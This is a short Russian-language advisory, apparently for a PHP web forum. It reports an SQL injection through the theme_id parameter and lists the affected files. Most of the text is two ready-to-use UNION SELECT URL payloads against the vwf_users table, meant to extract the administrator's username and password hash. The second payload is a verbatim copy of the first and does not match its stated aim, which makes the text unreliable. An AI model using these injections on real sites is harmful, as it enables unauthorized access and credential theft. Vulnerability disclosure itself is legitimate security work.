Описание:
Уязвимости находятся в:
php/functions.php
php/functions_update.php
php/functions_display.php
Уязвимость находится в theme_id и позволит ввести SQL-инъекцию.
Для получения административного имени пользователя:
http://hostname/webforum/index.php? theme_id=-1% 20union%20select%
201,2,name, 4,5%20from% 20vwf_users% 20where%20userid=1/*
Для получения хеш пароля администратора:
http://hostname/webforum/index.php? theme_id=-1% 20union%20select%
201,2,name, 4,5%20from% 20vwf_users% 20where%20userid=1/*